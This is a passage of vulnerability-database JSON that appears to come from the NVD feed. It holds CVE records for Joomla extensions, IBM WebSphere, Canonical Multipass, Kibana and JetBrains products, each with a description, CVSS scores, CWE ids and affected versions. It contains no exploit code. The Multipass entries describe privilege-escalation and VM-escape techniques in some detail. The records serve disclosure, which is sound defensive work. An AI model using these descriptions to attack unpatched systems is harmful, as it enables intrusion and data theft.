ata":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"security@joomla.org","type":"Primary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:advanced_custom_fields:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"2.8.12","matchCriteriaId":"189398D2-7A8E-42FA-B18A-190945A234BB"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:advanced_custom_fields:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"3.0.0","versionEndIncluding":"3.1.3","matchCriteriaId":"DCD7517D-D254-4C31-B75A-CB2CF99DE02E"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:convert_forms:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"4.4.12","matchCriteriaId":"5F57C1C4-8DA9-4C0C-87AE-02341CA6BDF5"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:convert_forms:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"5.0.0","versionEndIncluding":"5.1.5","matchCriteriaId":"461F45C6-72EA-490F-A6F1-683F880614B9"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:engagebox:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"6.3.11","matchCriteriaId":"18C0CF40-BC13-4125-B7CE-0FA32F94A574"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:engagebox:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"7.0.0","versionEndIncluding":"7.1.1","matchCriteriaId":"9F153D8A-C07C-43BD-B3DC-30C53AEE12E9"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:google_structured_data:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"5.6.11","matchCriteriaId":"E58A9D7E-0BD5-4A86-928E-BEB4084BD22D"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:google_structured_data:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"6.0.0","versionEndIncluding":"6.1.9","matchCriteriaId":"46F36745-0D2B-4E06-B4FF-1B1403801A87"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:mailchimp_auto-subscribe:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"5.0.5","matchCriteriaId":"E78F126A-D3E9-474C-8DD5-553E99E48BB8"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:mailchimp_auto-subscribe:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"5.1.0","versionEndIncluding":"5.2.0","matchCriteriaId":"08EBEB77-3F2B-424A-B845-37DD6274CF94"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:smile_pack:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"1.2.6","matchCriteriaId":"2CC95C07-5786-4C8D-B7C3-67C73B9050AD"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:smile_pack:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"2.0.0","versionEndIncluding":"2.1.0","matchCriteriaId":"35E61D16-F5A4-4D04-8086-F5B4A40EDC4F"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:tassos_code_snippets:1.0.0:*:*:*:*:joomla\\!:*:*","matchCriteriaId":"01825E14-AEA5-4C97-A665-E344E24F5C5B"},{"vulnerable":true,"criteria":"cpe:2.3:a:tassos:tassos_framework:*:*:*:*:*:joomla\\!:*:*","versionStartIncluding":"1.0.0","versionEndIncluding":"6.0.1","matchCriteriaId":"08D7C0CF-C6F8-4FB3-A86A-75FBA632900D"}]}]}],"references":[{"url":"https://tassos.gr","source":"security@joomla.org","tags":["Product"]}]}},{"cve":{"id":"CVE-2026-4410","sourceIdentifier":"psirt@us.ibm.com","published":"2026-05-27T14:17:33.660","lastModified":"2026-06-01T14:28:24.160","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"IBM WebSphere Application Server - Liberty 19.0.0.7 through 26.0.0.5 and IBM WebSphere Application Server 9.0, and 8.5 and WebSphere Application Server Liberty are vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources."}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:-:*:*:*","versionStartIncluding":"8.5.0.0","versionEndIncluding":"8.5.5.29","matchCriteriaId":"631AA3FA-7D84-45CB-A5DB-9DEB7ABF32E7"},{"vulnerable":true,"criteria":"cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:-:*:*:*","versionStartIncluding":"9.0.0.0","versionEndIncluding":"9.0.5.27","matchCriteriaId":"C7A90C7D-5C17-4C1E-B6F8-9E70851863AA"},{"vulnerable":true,"criteria":"cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:liberty:*:*:*","versionStartIncluding":"19.0.0.7","versionEndIncluding":"26.0.0.5","matchCriteriaId":"9FB44040-AC0C-45B7-BA73-037911B6988F"}]}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7273424","source":"psirt@us.ibm.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49237","sourceIdentifier":"security@ubuntu.com","published":"2026-05-28T14:16:24.270","lastModified":"2026-06-01T13:27:32.780","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in Canonical Multipass for macOS before version 1.16.3 due to an incomplete fix for CVE-2025-5199. While the patch in version 1.16.0 updated the ownership of the multipassd daemon binary to root:wheel, five co-located binaries (multipass, qemu-img, qemu-system-aarch64, qemu-system-x86_64, and sshfs_server) in /Library/Application Support/com.canonical.multipass/bin/ retain ownership by the installing user and remain writable. Because the root LaunchDaemon (com.canonical.multipassd.plist) configures a PATH environment variable that prioritizes this user-writable directory and invokes these auxiliary binaries by their bare names, a local attacker can replace an auxiliary binary (such as qemu-img) with a malicious wrapper. When the root daemon subsequently triggers the binary during routine execution (e.g., via multipass launch), the malicious code executes with root privileges, leading to local privilege escalation."}],"metrics":{"cvssMetricV31":[{"source":"security@ubuntu.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"security@ubuntu.com","type":"Secondary","description":[{"lang":"en","value":"CWE-276"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:canonical:multipass:*:*:*:*:*:*:*:*","versionEndExcluding":"1.16.3","matchCriteriaId":"633AA429-4296-43D2-8F9F-D5115F121BD3"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*","matchCriteriaId":"387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}],"references":[{"url":"https://github.com/canonical/multipass/security/advisories/GHSA-r2xg-x32f-23c5","source":"security@ubuntu.com","tags":["Third Party Advisory","Exploit"]}]}},{"cve":{"id":"CVE-2026-49238","sourceIdentifier":"security@ubuntu.com","published":"2026-05-28T14:16:24.403","lastModified":"2026-06-01T13:26:31.580","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in Canonical Multipass before version 1.16.3. The host-side SFTP server component (sshfs_server), which executes with root privileges on the host, contains a path containment bypass vulnerability within its validate_path function in src/sshfs_mount/sftp_server.cpp. The function performs a plain string prefix comparison on requested paths without path separator validation or dot-dot (..) normalization. A local attacker with root privileges inside a guest virtual machine can bypass the FUSE layer by injecting raw SFTP frames (such as an SSH_FXP_OPEN request) directly into the sshfs_server process stdin/stdout pipes via procfs. By supplying a path containing directory traversal sequences that match the allowed mount prefix, the attacker can force the host-side root process to resolve the traversal and open files outside the designated mount boundary. This allows a guest-side user to read arbitrary files on the host filesystem, resulting in a virtual machine escape."}],"metrics":{"cvssMetricV31":[{"source":"security@ubuntu.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","baseScore":8.4,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.0,"impactScore":5.8}]},"weaknesses":[{"source":"security@ubuntu.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:canonical:multipass:*:*:*:*:*:*:*:*","versionEndExcluding":"1.16.3","matchCriteriaId":"633AA429-4296-43D2-8F9F-D5115F121BD3"}]}]}],"references":[{"url":"https://github.com/canonical/multipass/security/advisories/GHSA-rhp2-23c4-r34w","source":"security@ubuntu.com","tags":["Third Party Advisory","Exploit"]},{"url":"https://github.com/canonical/multipass/security/advisories/GHSA-rhp2-23c4-r34w","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Third Party Advisory","Exploit"]}]}},{"cve":{"id":"CVE-2026-42398","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:30.180","lastModified":"2026-06-01T14:17:50.670","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Server-Side Request Forgery (CWE-918) in Kibana allows authenticated users with connector management privileges to bypass the operator-configured connection allowlist. By configuring a Webhook connector with a crafted target, an attacker can cause Kibana to issue outbound requests to destinations that the egress restriction controls were intended to block."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.2.8","matchCriteriaId":"301F60F3-1479-432C-875A-76797F9A16D8"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.3.0","versionEndExcluding":"9.3.2","matchCriteriaId":"C0BF565A-EF1A-4A9F-A234-BDE468EDD3E6"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-9-2-8-and-9-3-2-security-update-esa-2026-37/386557","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-42399","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:30.323","lastModified":"2026-06-01T14:14:05.367","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated low-privileged user can cause Kibana to consume exponentially increasing amounts of memory by submitting a specially crafted Timelion visualization expression containing deeply chained function calls. The resulting data structure grows without bound, exhausting available memory and causing the Kibana service to crash and become unavailable to all users."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.3.5","matchCriteriaId":"E9B40710-912A-4157-9F25-89CE26C098A9"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-8-19-16-and-9-3-5-security-update-esa-2026-36/386556","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-42400","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:30.497","lastModified":"2026-06-01T14:13:36.980","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user can send a specially crafted compressed request payload that is processed prior to authorization checks, causing excessive memory and CPU resource consumption that can result in a Kibana instance becoming unresponsive or crashing."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.3.5","matchCriteriaId":"E9B40710-912A-4157-9F25-89CE26C098A9"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.4.0","versionEndExcluding":"9.4.2","matchCriteriaId":"81FF6553-FE7A-475D-9D50-5D0FC66FE375"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-8-19-16-9-3-5-9-4-2-security-update-esa-2026-35/386554","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49093","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:34.350","lastModified":"2026-06-01T14:13:11.843","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Server-Side Request Forgery (CWE-918) in Kibana can allow an authenticated user with connector management privileges to bypass the operator-configured connector allowlist, causing the Kibana server to issue outbound requests to destinations the egress controls were intended to block."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":4.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.3.0","versionEndExcluding":"9.3.3","matchCriteriaId":"5EE7B9F3-E587-498B-822D-785CB848F767"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-40/386562","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49094","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:34.503","lastModified":"2026-06-01T13:31:57.200","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with viewer-level access can submit a request containing an oversized input value to an analytics collections management endpoint. Kibana will consume excessive CPU and memory resources while processing the request. This results in Kibana becoming unavailable to all users until the service is manually recovered."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-8-19-16-security-update-esa-2026-39/386561/1","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49095","sourceIdentifier":"security@elastic.co","published":"2026-05-28T21:16:34.660","lastModified":"2026-06-01T13:30:50.997","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Input Validation (CWE-20) in the Kibana Fleet agent policy management feature can lead to privilege escalation. An authenticated user with Fleet management privileges can manipulate agent policy configuration by injecting values into a configuration override mechanism that is not adequately validated. An attacker can cause Elastic Agents to be issued API keys with elevated Elasticsearch privileges, potentially granting unauthorized read and write access to sensitive Elasticsearch security indices beyond what is intended for the Fleet management role."}],"metrics":{"cvssMetricV31":[{"source":"security@elastic.co","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":5.2}]},"weaknesses":[{"source":"security@elastic.co","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"8.0.0","versionEndExcluding":"8.19.16","matchCriteriaId":"43EDC5B3-131D-489E-8447-05C5C599E6A7"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.0.0","versionEndExcluding":"9.3.5","matchCriteriaId":"E9B40710-912A-4157-9F25-89CE26C098A9"},{"vulnerable":true,"criteria":"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*","versionStartIncluding":"9.4.0","versionEndExcluding":"9.4.2","matchCriteriaId":"81FF6553-FE7A-475D-9D50-5D0FC66FE375"}]}]}],"references":[{"url":"https://discuss.elastic.co/t/kibana-fleet-8-19-16-9-3-5-and-9-4-2-security-update-esa-2026-38/386559","source":"security@elastic.co","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49366","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.313","lastModified":"2026-06-01T13:59:21.370","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1.1 command injection was possible via filename completion"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-78"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.1","matchCriteriaId":"2FC70797-25C7-4E0C-9E47-0EA1AD21E4B3"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49367","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.440","lastModified":"2026-06-01T13:56:59.427","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1.1 command execution was possible via the guest user account"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H","baseScore":8.0,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.1,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.1","matchCriteriaId":"2FC70797-25C7-4E0C-9E47-0EA1AD21E4B3"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49368","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.553","lastModified":"2026-06-01T12:56:25.727","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13162 stored XSS in project notification templates was possible"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":5.8},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13162","matchCriteriaId":"16BA3B34-2381-4EDE-A6C7-AF6D710E9FFD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49369","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.677","lastModified":"2026-06-01T12:56:04.370","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on Users and Groups pages"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13162","matchCriteriaId":"16BA3B34-2381-4EDE-A6C7-AF6D710E9FFD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49370","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.793","lastModified":"2026-06-01T12:52:41.640","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp 